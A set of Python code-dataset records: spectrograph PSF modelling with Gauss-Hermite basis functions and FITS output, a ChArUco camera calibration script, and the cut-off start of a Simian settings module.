self.create_basisfunc(actwavelength,good_wavelength,goodwaveypos,xpos_final,arcSigma,flatSigma,rowimage,x1im,x2im,y1im,y2im,fiberflat,kcons,mor,nor) \n # checking if all values are non-zero\n if (flag == 1):\n basisfuncstack = n.hstack((basisfuncstack,basisfunc))\n basisstack = n.hstack((basisstack,basisimage))\n else:\n break \n if (flag == 0):\n break\n if (flag == 0):\n continue\n \n\n basis = n.sum(n.sum(basisfuncstack[:,:,:,:],axis = 1),axis = 0)\n nk = n.shape(basisfunc)[1]\n nlambda = n.shape(basisfunc)[0]\n ni = n.shape(basisfunc)[2]\n nj = n.shape(basisfunc)[3]\n\n N = n.zeros((ni*nj,ni*nj))\n invvr_sub = self.invvr[y1im:y2im+1,x1im:x2im+1]\n flat_invvr = n.ravel(invvr_sub)\n N = n.diag(flat_invvr)\n \n p = n.ravel(rowimage)\n p1= n.zeros((len(p),1))\n p1[:,0] = p\n B1 = basisstack[:,1:]\n scaledbasis = n.zeros((ni*nj ,1))\n [theta,t2,l1,t1,t2] = self.calparam(B1,N,p1)\n GHparam[i_actwave,i_bund,mm[1:],nn[1:]] = theta[:,0]/theta[0,0]\n #print theta\n #print i_actwave \n # model image\n scaledbasis = n.dot(B1, theta)\n scaledbasis1 = n.zeros((len(scaledbasis[:,0]),1))\n scaledbasis1[:,0] = scaledbasis[:,0]\n \n #chi-squared value\n ndiag = n.zeros((len(N),1))\n ndiag[:,0] = n.diag(N)\n nz = n.where(scaledbasis1 != 0)\n err = (p1[nz]-scaledbasis1[nz])*n.sqrt(ndiag[nz])\n chi_sqrd[i_actwave,i_bund,0] = n.mean(n.power(err,2))\n scaledbasis.resize(ni,nj) \n scaledbasis4 = scaledbasis\n \n # Residual values\n residualGH = rowimage - scaledbasis\n \n xcenter[i_actwave,i_bund,:] = xcenarr\n ycenter[i_actwave,i_bund,:] = ycenarr\n sigma[i_actwave,i_bund,:] = sigmaarr \n \n #arcmodel2D.degree = 3\n \n # loop to get the value of PSF parameters at all wavelengths \n for i_fib in range(0, arcmodel2D.fibBun):\n for i_plot in range(1, len(mm)):\n wavecons = wavelength[:, i_bund*arcmodel2D.fibBun + i_fib]\n param = GHparam[self.reqwave, i_bund, mm[i_plot], nn[i_plot]]\n z = n.polyfit(good_wavelength[self.reqwave], param, arcmodel2D.degree)\n p = n.poly1d(z)\n coeffAll[i_fib, :, mm[i_plot], nn[i_plot]] = z\n \n PSFArc = self.createPSFArc(GHparam,xcenter, ycenter, sigma,good_wavelength,mm,nn,i_bund)\n PSFBasis = self.createPSFBasis(coeffAll, wavelength, xpos_final, flatSigma,good_wavelength,mm,nn,i_bund)\n return (PSFArc , PSFBasis)\n\n # Function creates basis function at known wavelengths of arc-frames\n def create_basisfunc(self, actwavelength,good_wavelength,goodwaveypos,xpos_final,arcSigma,flatSigma,rowimage,x1im,x2im,y1im,y2im,fiberflat,kcons,mor,nor):\n datacenterval = n.zeros((arcmodel2D.fibBun,1))\n fibcons = n.arange(kcons,kcons+arcmodel2D.fibBun,1) \n n_k = n.zeros((len(fibcons),1))\n numx = n.shape(rowimage)[1]\n numy = n.shape(rowimage)[0]\n numk = len(fibcons) \n numlambda_val = 1\n basisfunc = n.zeros((numlambda_val,numk,numy,numx)) \n zero1 = n.zeros((numlambda_val,numk,numy,numx)) \n zero2 = n.zeros((numy*numx,1)) \n basisstack = 0\n xcenarr = n.zeros((arcmodel2D.fibBun))\n ycenarr = n.zeros((arcmodel2D.fibBun))\n sigmaarr = n.zeros((arcmodel2D.fibBun))\n for i_k in range(0,numk):\n testwave = actwavelength\n func = interpolate.interp1d(good_wavelength,goodwaveypos[:,fibcons[i_k]], kind='cubic')\n ypix = func(testwave)\n xpix = xpos_final[round(ypix),fibcons[i_k]]\n sigmaA = arcSigma[round(ypix),fibcons[i_k]] \n sigmaF = flatSigma[round(ypix),fibcons[i_k]]\n iceny = round(ypix)\n ycen = ypix\n yr = ycen-iceny\n cenA = yr\n icenx = round(xpix)\n xcen = (xpix)\n xr = xcen-icenx\n cenF = xr \n xcenarr[i_k] = xcen\n ycenarr[i_k] = ycen\n sigmaarr[i_k] = sigmaF\n starty= iceny-y1im\n 
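# (starty, startx): center of the 11x11 PGH stamp, expressed in the pixel frame of the rowimage cut-out\n            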
startx= icenx-x1im\n xPSF = n.zeros((len(arcmodel2D.x),1))\n yPSF = n.zeros((len(arcmodel2D.y),1))\n #xPSF[:,0] = GH.pgh(x=arcmodel2D.x, xc = cenF, sigma = sigmaF ,m = mor)\n xPSF[:,0] = GH.pgh(arcmodel2D.x, mor, cenF, sigmaF)\n yPSF[:,0] = GH.pgh(arcmodel2D.y, nor, cenA, sigmaF)\n out = n.outer(yPSF,xPSF)\n datacenterval[i_k,0] = rowimage[starty,startx]\n basisfunc[0,i_k,starty+arcmodel2D.y[0]:(starty+arcmodel2D.y[len(arcmodel2D.y)-1]+1),startx+arcmodel2D.x[0]:(startx+arcmodel2D.x[len(arcmodel2D.x)-1]+1)] = out\n func_n_k = interpolate.interp1d(self.yvalues,fiberflat[fibcons[i_k],:])\n n_kVal = func_n_k(ypix)\n # relative fiber throughput (n_k) changed to take value from spFlat files.\n n_k[i_k,0] = n_kVal\n n_kzero= n.where(n_k[:,0] == 0)\n if (n.shape(n_kzero)[1] > 15 ):\n flag = 0\n #return(n_k,zero1,zero2,flag,datacenterval)\n return(n_k,zero1,zero2,flag,xcenarr,ycenarr,sigmaarr)\n else:\n basisimage = self.basisimg(basisfunc, n_k)\n flag = 1\n #return (n_k,basisfunc, basisimage,flag,datacenterval) \n return (n_k,basisfunc, basisimage,flag,xcenarr, ycenarr, sigmaarr) \n\n # supress the four dimensional basis function to two-dimensional\n def basisimg(self, A00, n_k):\n nlambda = n.shape(A00)[0]\n nk = n.shape(A00)[1]\n ni = n.shape(A00)[2]\n nj = n.shape(A00)[3]\n A_twod = n.zeros((ni*nj,nlambda*nk))\n B00= n.zeros((ni*nj ,1))\n i_l = 0\n i_m = 0\n numlambda_val = nlambda\n numk = nk\n for i_lam in range(0,numlambda_val):\n for i_k in range(0,numk):\n a = A00[i_lam, i_k,:,:]\n b = n.ravel(a)\n nterms = len(b)\n A_twod[:,i_m] = b\n i_m = i_m + 1\n B00 = n.dot(A_twod,n_k) \n return B00\n\n def calparam(self, B,N,p1):\n l1 = n.dot(n.transpose(B),N)\n t1 = n.dot(l1,p1)\n t2 = n.dot(l1,B)\n theta = n.dot(linalg.pinv(t2),t1)\n return(theta,t2,l1,t1,t2)\n \n # write to FITS file\n def createPSFBasis(self, coeffAll, wavelength, xpos_final, flatSigma,good_wavelength,mm,nn, i_bund):\n mm = [0,0,0,0,0,0,1,1,1,1,2,2,2,3,3,4]\n nn = [0,0,1,2,3,4,0,1,2,3,0,1,2,0,1,0] \n theta0 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta1 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta2 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta3 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta4 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta5 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta6 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta7 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta8 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta9 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta10 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta11 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta12 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta13 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n theta14 = n.zeros((arcmodel2D.fibBun,arcmodel2D.degree+1))\n final_wavelength = n.zeros((arcmodel2D.fibBun,self.ypoints))\n\n theta0 = coeffAll[: , :,mm[1],nn[1]]\n theta1 = coeffAll[: , :,mm[2],nn[2]]\n theta2 = coeffAll[: , :,mm[3],nn[3]]\n theta3 = coeffAll[: ,:, mm[4],nn[4]]\n theta4 = coeffAll[: , :,mm[5],nn[5]]\n theta5 = coeffAll[: , :,mm[6],nn[6]]\n theta6 = coeffAll[: , :,mm[7],nn[7]]\n theta7 = coeffAll[: , :,mm[8],nn[8]]\n theta8 = coeffAll[: , :,mm[9],nn[9]]\n theta9 = coeffAll[: , :,mm[10],nn[10]]\n theta10 = coeffAll[: , :,mm[11],nn[11]]\n theta11 = coeffAll[: ,:, mm[12],nn[12]]\n theta12 = coeffAll[: ,:, mm[13],nn[13]]\n theta13 = coeffAll[: , :,mm[14],nn[14]]\n theta14 = coeffAll[: , 
:,mm[15],nn[15]]\n \n a = n.arange(0,self.ypoints, dtype=float)\n b=n.transpose(a)\n q = b.repeat(arcmodel2D.fibBun)\n a = n.reshape(q, (self.ypoints,arcmodel2D.fibBun))\n ycenterf = n.transpose(a)\n \n xcenterf = n.transpose(xpos_final[:, i_bund*arcmodel2D.fibBun : i_bund*arcmodel2D.fibBun+arcmodel2D.fibBun])\n sigmaarrf = n.transpose(flatSigma[:, i_bund*arcmodel2D.fibBun : i_bund*arcmodel2D.fibBun+arcmodel2D.fibBun])\n final_wavelength= n.transpose(n.log10(wavelength[:, i_bund*arcmodel2D.fibBun : i_bund*arcmodel2D.fibBun+arcmodel2D.fibBun]))\n\n hdu0 = pf.PrimaryHDU(xcenterf)\n hdu0.header.update('PSFTYPE', 'GAUSS-HERMITE', 'GAUSS-HERMITE POLYNOMIALS') \n hdu0.header.update('NPIX_X', arcmodel2D.xpoints, 'number of image pixels in the X-direction')\n hdu0.header.update('NPIX_Y', self.ypoints, 'number of image pixels in the Y-direction')\n hdu0.header.update('NFLUX', self.ypoints, 'number of flux bins per spectrum [NAXIS1]')\n hdu0.header.update('NSPEC', arcmodel2D.fibBun, 'number of spectra [NAXIS2]')\n hdu0.header.update('PSFPARAM', 'X', 'X position as a function of flux bin')\n\n hdu1 = pf.ImageHDU(ycenterf)\n hdu1.header.update('PSFPARAM', 'Y', 'Y position as a function of flux bin')\n\n hdu2 = pf.ImageHDU(final_wavelength)\n hdu2.header.update('PSFPARAM', 'LogLam', 'Known Wavelengths of an arc-frame')\n\n hdu3 = pf.ImageHDU(sigmaarrf)\n hdu3.header.update('PSFPARAM', 'sigma', 'Gaussian sigma values of basis')\n\n hdu4 = pf.ImageHDU(theta0)\n hdu4.header.update('PSFPARAM', 'PGH(0,0)', 'Pixelated Gauss-Hermite Order: (0,0)')\n\n hdu5 = pf.ImageHDU(theta1)\n hdu5.header.update('PSFPARAM', 'PGH(0,1)', 'Pixelated Gauss-Hermite Order: (0,1)')\n\n hdu6 = pf.ImageHDU(theta2)\n hdu6.header.update('PSFPARAM', 'PGH(0,2)', 'Pixelated Gauss-Hermite Order: (0,2)')\n\n hdu7 = pf.ImageHDU(theta3)\n hdu7.header.update('PSFPARAM', 'PGH(0,3)', 'Pixelated Gauss-Hermite Order: (0,3)')\n\n hdu8 = pf.ImageHDU(theta4)\n hdu8.header.update('PSFPARAM', 'PGH(0,4)', 'Pixelated Gauss-Hermite Order: (0,4)') \n\n hdu9 = pf.ImageHDU(theta5)\n hdu9.header.update('PSFPARAM', 'PGH(1,0)', 'Pixelated Gauss-Hermite Order: (1,0)')\n\n hdu10 = pf.ImageHDU(theta6)\n hdu10.header.update('PSFPARAM', 'PGH(1,1)', 'Pixelated Gauss-Hermite Order: (1,1)')\n\n hdu11 = pf.ImageHDU(theta7)\n hdu11.header.update('PSFPARAM', 'PGH(1,2)', 'Pixelated Gauss-Hermite Order: (1,2)')\n\n hdu12 = pf.ImageHDU(theta8)\n hdu12.header.update('PSFPARAM', 'PGH(1,3)', 'Pixelated Gauss-Hermite Order: (1,3)')\n\n hdu13 = pf.ImageHDU(theta9)\n hdu13.header.update('PSFPARAM', 'PGH(2,0)', 'Pixelated Gauss-Hermite Order: (2,0)')\n\n hdu14 = pf.ImageHDU(theta10)\n hdu14.header.update('PSFPARAM', 'PGH(2,1)', 'Pixelated Gauss-Hermite Order: (2,1)')\n\n hdu15 = pf.ImageHDU(theta11)\n hdu15.header.update('PSFPARAM', 'PGH(2,2)', 'Pixelated Gauss-Hermite Order: (2,2)')\n\n hdu16 = pf.ImageHDU(theta12)\n hdu16.header.update('PSFPARAM', 'PGH(3,0)', 'Pixelated Gauss-Hermite Order: (3,0)')\n\n hdu17 = pf.ImageHDU(theta13)\n hdu17.header.update('PSFPARAM', 'PGH(3,1)', 'Pixelated Gauss-Hermite Order: (3,1)')\n\n hdu18 = pf.ImageHDU(theta14)\n hdu18.header.update('PSFPARAM', 'PGH(4,0)', 'Pixelated Gauss-Hermite Order: (4,0)')\n hdulist = pf.HDUList([hdu0, hdu1, hdu2,hdu3,hdu4,hdu5,hdu6,hdu7,hdu8,hdu9,hdu10,hdu11,hdu12,hdu13,hdu14, hdu15, hdu16, hdu17, hdu18])\n \n cols = {'arcid':self.arcid,'i_bund':str(i_bund).zfill(2)}\n fname = self.outdir + \"/spBasisPSF-GH4-%(arcid)s-%(i_bund)s.fits\" % cols\n \n hdulist.writeto(fname, clobber=True)\n return (fname)\n\n def 
createPSFArc(self, GHparam, xcenter, ycenter, sigma,good_wavelength,mm,nn, i_bund):\n xcenterf = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n ycenterf = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n sigmaarrf = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta0 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta1 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta2 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta3 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta4 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta5 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta6 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta7 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta8 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta9 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta10 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta11 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta12 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta13 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n theta14 = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n final_wavelength = n.zeros((arcmodel2D.fibNo,self.nwavelen))\n\n mm = [0,0,0,0,0,0,1,1,1,1,2,2,2,3,3,4]\n nn = [0,0,1,2,3,4,0,1,2,3,0,1,2,0,1,0] \n \n for i_wave in range(0, self.nwavelen):\n theta0[:,i_wave] = GHparam[i_wave, : , mm[1],nn[1]].repeat(arcmodel2D.fibBun)\n theta1[:,i_wave] = GHparam[i_wave, : , mm[2],nn[2]].repeat(arcmodel2D.fibBun)\n theta2[:,i_wave] = GHparam[i_wave, : , mm[3],nn[3]].repeat(arcmodel2D.fibBun)\n theta3[:,i_wave] = GHparam[i_wave, : , mm[4],nn[4]].repeat(arcmodel2D.fibBun)\n theta4[:,i_wave] = GHparam[i_wave, : , mm[5],nn[5]].repeat(arcmodel2D.fibBun)\n theta5[:,i_wave] = GHparam[i_wave, : , mm[6],nn[6]].repeat(arcmodel2D.fibBun)\n theta6[:,i_wave] = GHparam[i_wave, : , mm[7],nn[7]].repeat(arcmodel2D.fibBun)\n theta7[:,i_wave] = GHparam[i_wave, : , mm[8],nn[8]].repeat(arcmodel2D.fibBun)\n theta8[:,i_wave] = GHparam[i_wave, : , mm[9],nn[9]].repeat(arcmodel2D.fibBun)\n theta9[:,i_wave] = GHparam[i_wave, : , mm[10],nn[10]].repeat(arcmodel2D.fibBun)\n theta10[:,i_wave] = GHparam[i_wave, : , mm[11],nn[11]].repeat(arcmodel2D.fibBun)\n theta11[:,i_wave] = GHparam[i_wave, : , mm[12],nn[12]].repeat(arcmodel2D.fibBun)\n theta12[:,i_wave] = GHparam[i_wave, : , mm[13],nn[13]].repeat(arcmodel2D.fibBun)\n theta13[:,i_wave] = GHparam[i_wave, : , mm[14],nn[14]].repeat(arcmodel2D.fibBun)\n theta14[:,i_wave] = GHparam[i_wave, : , mm[15],nn[15]].repeat(arcmodel2D.fibBun)\n \n xcenterf[:,i_wave] = n.ravel(xcenter[i_wave, :, :])\n ycenterf[:,i_wave] = n.ravel(ycenter[i_wave, :, :])\n \n final_wavelength[:,i_wave] = (n.log10(good_wavelength[i_wave])).repeat(arcmodel2D.fibNo)\n \n sigmaarrf[:,i_wave] = n.ravel(sigma[i_wave, :, :])\n\n \n # write to FITS file\n hdu0 = pf.PrimaryHDU(xcenterf)\n hdu0.header.update('PSFTYPE', 'GAUSS-HERMITE', 'GAUSS-HERMITE POLYNOMIALS') \n hdu0.header.update('NPIX_X', arcmodel2D.xpoints, 'number of image pixels in the X-direction')\n hdu0.header.update('NPIX_Y', self.ypoints, 'number of image pixels in the Y-direction')\n hdu0.header.update('NFLUX', self.nwavelen, 'number of flux bins per spectrum [NAXIS1]')\n hdu0.header.update('NSPEC', arcmodel2D.fibNo, 'number of spectra [NAXIS2]')\n hdu0.header.update('PSFPARAM', 'X', 'X position as a function of flux bin')\n\n hdu1 = pf.ImageHDU(ycenterf)\n hdu1.header.update('PSFPARAM', 'Y', 'Y position as a function of flux bin')\n\n hdu2 = pf.ImageHDU(final_wavelength)\n hdu2.header.update('PSFPARAM', 'LogLam', 'Known Wavelengths of an arc-frame')\n\n hdu3 = 
pf.ImageHDU(sigmaarrf)\n hdu3.header.update('PSFPARAM', 'sigma', 'Gaussian sigma values of basis')\n\n hdu4 = pf.ImageHDU(theta0)\n hdu4.header.update('PSFPARAM', 'PGH(0,0)', 'Pixelated Gauss-Hermite Order: (0,0)')\n\n hdu5 = pf.ImageHDU(theta1)\n hdu5.header.update('PSFPARAM', 'PGH(0,1)', 'Gauss-Hermite Order: (0,1)')\n\n hdu6 = pf.ImageHDU(theta2)\n hdu6.header.update('PSFPARAM', 'PGH(0,2)', 'Gauss-Hermite Order: (0,2)')\n\n hdu7 = pf.ImageHDU(theta3)\n hdu7.header.update('PSFPARAM', 'PGH(0,3)', 'Gauss-Hermite Order: (0,3)')\n\n hdu8 = pf.ImageHDU(theta4)\n hdu8.header.update('PSFPARAM', 'PGH(0,4)', 'Gauss-Hermite Order: (0,4)') \n\n hdu9 = pf.ImageHDU(theta5)\n hdu9.header.update('PSFPARAM', 'PGH(1,0)', 'Gauss-Hermite Order: (1,0)')\n\n hdu10 = pf.ImageHDU(theta6)\n hdu10.header.update('PSFPARAM', 'PGH(1,1)', 'Gauss-Hermite Order: (1,1)')\n\n hdu11 = pf.ImageHDU(theta7)\n hdu11.header.update('PSFPARAM', 'PGH(1,2)', 'Gauss-Hermite Order: (1,2)')\n\n hdu12 = pf.ImageHDU(theta8)\n hdu12.header.update('PSFPARAM', 'PGH(1,3)', 'Gauss-Hermite Order: (1,3)')\n\n hdu13 = pf.ImageHDU(theta9)\n hdu13.header.update('PSFPARAM', 'PGH(2,0)', 'Gauss-Hermite Order: (2,0)')\n\n hdu14 = pf.ImageHDU(theta10)\n hdu14.header.update('PSFPARAM', 'PGH(2,1)', 'Gauss-Hermite Order: (2,1)')\n\n hdu15 = pf.ImageHDU(theta11)\n hdu15.header.update('PSFPARAM', 'PGH(2,2)', 'Gauss-Hermite Order: (2,2)')\n\n hdu16 = pf.ImageHDU(theta12)\n hdu16.header.update('PSFPARAM', 'PGH(3,0)', 'Gauss-Hermite Order: (3,0)')\n\n hdu17 = pf.ImageHDU(theta13)\n hdu17.header.update('PSFPARAM', 'PGH(3,1)', 'Gauss-Hermite Order: (3,1)')\n\n hdu18 = pf.ImageHDU(theta14)\n hdu18.header.update('PSFPARAM', 'PGH(4,0)', 'Gauss-Hermite Order: (4,0)')\n\n hdulist = pf.HDUList([hdu0, hdu1, hdu2,hdu3,hdu4,hdu5,hdu6,hdu7,hdu8,hdu9,hdu10,hdu11,hdu12,hdu13,hdu14, hdu15, hdu16, hdu17, hdu18])\n\n cols = {'arcid':self.arcid,'i_bund':str(i_bund).zfill(2)}\n fname = self.outdir + \"/spArcPSF-GH4-%(arcid)s-%(i_bund)s.fits\" % cols\n\n hdulist.writeto(fname, clobber=True)\n return (fname)\n \n def dataspArc(self):\n\n # Number of fibers \n nfib = n.shape(self.spArc_image)[0]\n ndatapt = n.shape(self.spArc_image)[1]\n\n # y-sigma values\n xmin = self.ysigma['XMIN'][0]\n xmax = self.ysigma['XMAX'][0]\n coeff = self.ysigma['COEFF'][0]\n \n #- Work around pyfits bug which doesn't properly support 2D arrays in tables\n ncoeff = coeff.size / nfib\n coeff = coeff.reshape( (nfib, ncoeff) )\n \n nx = xmax-xmin+1\n xbase = n.arange(xmin,xmax-xmin+1,1)\n x_1 = xmin\n x_2 = xmax\n a = 2/(xmax-xmin)\n b = -1-a*xmin\n x_p_base = a*xbase + b\n l= n.zeros((ndatapt,))\n legendreDim = n.shape(coeff)[1]\n # Constructing Legendre Polynomial\n for i_leg in range (0, legendreDim):\n ltemp = special.legendre(i_leg)\n ltemp = ltemp(x_p_base)\n l = n.vstack((l,ltemp))\n\n ### r = n.transpose(coeff[0,:,:])\n r = coeff\n \n Ysig = n.dot(r,l[1:])\n Ysig = n.transpose(Ysig)\n arcSigma =Ysig\n \n #wavelength value at each Y-center\n xminwave = self.waveset['XMIN'][0]\n xmaxwave = self.waveset['XMAX'][0]\n coeffwave = self.waveset['COEFF'][0]\n\n #- Work around pyfits bug which doesn't properly support 2D arrays in tables\n ncoeffwave = coeffwave.size / nfib\n coeffwave = coeffwave.reshape( (nfib, ncoeffwave) )\n\n nxwave = xmaxwave-xminwave+1\n xbasewave = n.arange(xminwave,xmaxwave-xminwave+1,1)\n x_1wave = xminwave\n x_2wave = xmaxwave\n awave = 2/(xmaxwave-xminwave)\n bwave = -1-awave*xminwave\n x_p_basewave = awave*xbasewave + bwave\n dimwavept = n.shape(coeffwave)[1]\n dimwavept = 
dimwavept/nfib\n lwave= n.zeros((ndatapt,))\n dimwavept = n.shape(coeffwave)[1]\n # Constructing Legendre Polynomial\n for i_leg in range (0, dimwavept):\n lwavetemp = special.legendre(i_leg)\n lwavetemp = lwavetemp(x_p_basewave)\n lwave = n.vstack((lwave,lwavetemp))\n\n rwave = coeffwave.reshape(nfib,dimwavept)\n wavelength_tmp = n.dot(rwave,lwave[1:])\n wavelength= n.transpose(wavelength_tmp)\n wavelength = n.power(10,wavelength)\n \n # good wavelengths of Arc lamps \n good_wavelength = self.good_lambda_val[:,0]\n wavenum = n.shape(self.good_lambda_val)[0]\n lambdadim2 = n.shape(self.good_lambda_val)[1]\n goodwaveypos = self.good_lambda_val[0:wavenum, 1:lambdadim2]\n return(goodwaveypos, good_wavelength, wavelength, arcSigma)\n\n def dataspFlat(self):\n \n # Number of fibers \n nfib = n.shape(self.spFlat_image)[0]\n ndatapt = n.shape(self.spFlat_image)[1] \n \n # X- sigma \n xminSig = self.xsigma['XMIN'][0]\n xmaxSig = self.xsigma['XMAX'][0]\n coeffXSig = self.xsigma['COEFF'][0]\n\n #- Work around pyfits bug which doesn't properly support 2D arrays in tables\n ncoeffXSig = coeffXSig.size / nfib\n coeffXSig = coeffXSig.reshape( (nfib, ncoeffXSig) )\n \n nxSig = xmaxSig-xminSig+1\n xbaseSig = n.arange(xminSig,xmaxSig-xminSig+1,1)\n x_1Sig = xminSig\n x_2Sig = xmaxSig\n aSig = 2/(xmaxSig-xminSig)\n bSig = -1-aSig*xminSig\n x_p_baseSig = aSig*xbaseSig + bSig\n dimXSig = n.shape(coeffXSig)[1]\n dimXSig = dimXSig/nfib\n lXSig= n.zeros((ndatapt,))\n dimXSig = n.shape(coeffXSig)[1]\n # Constructing Legendre Polynomial\n for i_leg in range (0, dimXSig):\n lSigtemp = special.legendre(i_leg)\n lSigtemp = lSigtemp(x_p_baseSig)\n lXSig = n.vstack((lXSig,lSigtemp))\n \n rsigma = coeffXSig.reshape(nfib, dimXSig)\n Xsig = n.dot(rsigma,lXSig[1:])\n Xsig = n.transpose(Xsig)\n flatSigma = Xsig\n\n # X-centers\n xmin = self.peakPos['XMIN'][0]\n xmax = self.peakPos['XMAX'][0]\n coeffxpos = self.peakPos['COEFF'][0]\n \n #- Work around pyfits bug which doesn't properly support 2D arrays in tables\n ncoeffxpos = coeffxpos.size / nfib\n coeffxpos = coeffxpos.reshape( (nfib, ncoeffxpos) )\n \n nx = xmax-xmin+1\n xbase = n.arange(xmin,xmax-xmin+1,1)\n x_1 = xmin\n x_2 = xmax\n a = 2/(xmax-xmin)\n b = -1-a*xmin\n x_p_base = a*xbase + b\n dimxpos = n.shape(coeffxpos)[1]\n dimxpos = dimxpos/nfib\n lxpos = n.zeros((ndatapt,))\n dimxpos = n.shape(coeffxpos)[1]\n # Constructing Legendre Polynomial\n for i_leg in range (0, dimxpos):\n lxpostemp = special.legendre(i_leg)\n lxpostemp = lxpostemp(x_p_base)\n lxpos = n.vstack((lxpos ,lxpostemp))\n\n rxpos = coeffxpos.reshape(nfib, dimxpos)\n xpos = n.dot(rxpos,lxpos[1:])\n xpos_final = n.transpose(xpos)\n\n\n #fiber to fiber variatons from fiberflats\n fiberflat = self.spFlat_image\n return(fiberflat, xpos_final, flatSigma)\n","sub_path":"python/bbspec/spec2d/arcmodel2D.py","file_name":"arcmodel2D.py","file_ext":"py","file_size_in_byte":29925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"378453730","text":"import time\nimport cv2\nimport cv2.aruco as aruco\nimport numpy as np\nimport pickle\n\narucoType = aruco.DICT_5X5_250\ndictionary = cv2.aruco.getPredefinedDictionary(arucoType)\narucoBoard = aruco.CharucoBoard_create(9,6,0.7,0.5,aruco.Dictionary_get(arucoType))\n\ncap = cv2.VideoCapture(1)\n#cap.set(cv2.CAP_PROP_FRAME_WIDTH,2560)\n#cap.set(cv2.CAP_PROP_FRAME_HEIGHT,720)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 1344)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 376)\n\nwidth = cap.get(3)\nheigth = 
cap.get(4)\n\nyMin=0\nyMax=int(heigth) # cap.get() returns floats; Python 3 slice bounds must be ints\nxMin=0\nxMax = int(width/2) # left half of the side-by-side stereo frame\n\n\nallCorners = []\nallIds = []\ndecimator = 0\nfor i in range(50):\n\n    ret,frame = cap.read()\n    frame = frame[yMin:yMax,xMin:xMax] # this is all there is to cropping\n\n    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n    res = cv2.aruco.detectMarkers(gray,dictionary)\n\n    if len(res[0])>0:\n        res2 = cv2.aruco.interpolateCornersCharuco(res[0],res[1],gray,arucoBoard)\n        if res2[1] is not None and res2[2] is not None and len(res2[1])>3 and decimator%3==0:\n            allCorners.append(res2[1])\n            allIds.append(res2[2])\n\n        cv2.aruco.drawDetectedMarkers(gray,res[0],res[1])\n    #print i\n    cv2.imshow('frame',gray)\n    if cv2.waitKey(1000//5) & 0xFF == ord('q'): # waitKey takes int milliseconds; 1000/5 is a float in Python 3\n        break\n    decimator+=1\n\nimsize = gray.shape\n\n#Calibration fails for lots of reasons. Release the video if we do\nprint(\"Trying calibration\")\nretval, cameraMatrix, distCoeffs, rvecs, tvecs = cv2.aruco.calibrateCameraCharuco(allCorners,allIds,arucoBoard,imsize,None,None)\nprint(retval)\n# Writing the calibration data so it must not be repeated each time\n\ncamera_values = {'retval':retval, 'cameraMatrix':cameraMatrix,'distCoeffs':distCoeffs,'rvecs':rvecs,'tvecs':tvecs}\nfile_out = open( \"ZED_new_2.cal\", \"wb\" );\npickle.dump( camera_values, file_out)\nfile_out.close()\n\nprint(camera_values)\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"data_analysis/aruco_tools/CameraCalibrator.py","file_name":"CameraCalibrator.py","file_ext":"py","file_size_in_byte":1847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"14825430","text":"#!/usr/bin/env python\n# \n# Copyright 2012 Google Inc. All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS-IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# #\n\n\"\"\"Simian Settings Models.\"\"\"\n\n\n\n\nimport logging\n\nfrom google.appengine.ext import db\n\nfrom simian.mac.models import base\n\nSETTINGS = {\n 'api_info_key': {\n 'type': 'random_str',\n 'title': 'API Info Key',\n },\n 'apple_auto_promote_enabled': {\n 'type': 'bool',\n 'title': 'Apple Update Auto-Promotion Enabled',\n 'comment': 'If enabled, items auto-promote through release tracks.',\n 'default': True,\n },\n 'apple_auto_promote_stable_weekday': {\n 'type': 'integer',\n 'title': 'Apple Update Stable Auto-Promote Weekday',\n 'comment': 'Integer weekday, where Monday is 0 and Sunday is 6.',\n 'default': 2,\n },\n 'apple_auto_unattended_enabled': {\n 'type': 'bool',\n 'title': 'Apple Update Auto-Unattended Enabled',\n 'comment': ('If enabled, new updates not requiring a restart are set '\n 'as unattended automatically.'),\n 'default': True,\n },\n 'apple_unstable_grace_period_days': {\n 'type': 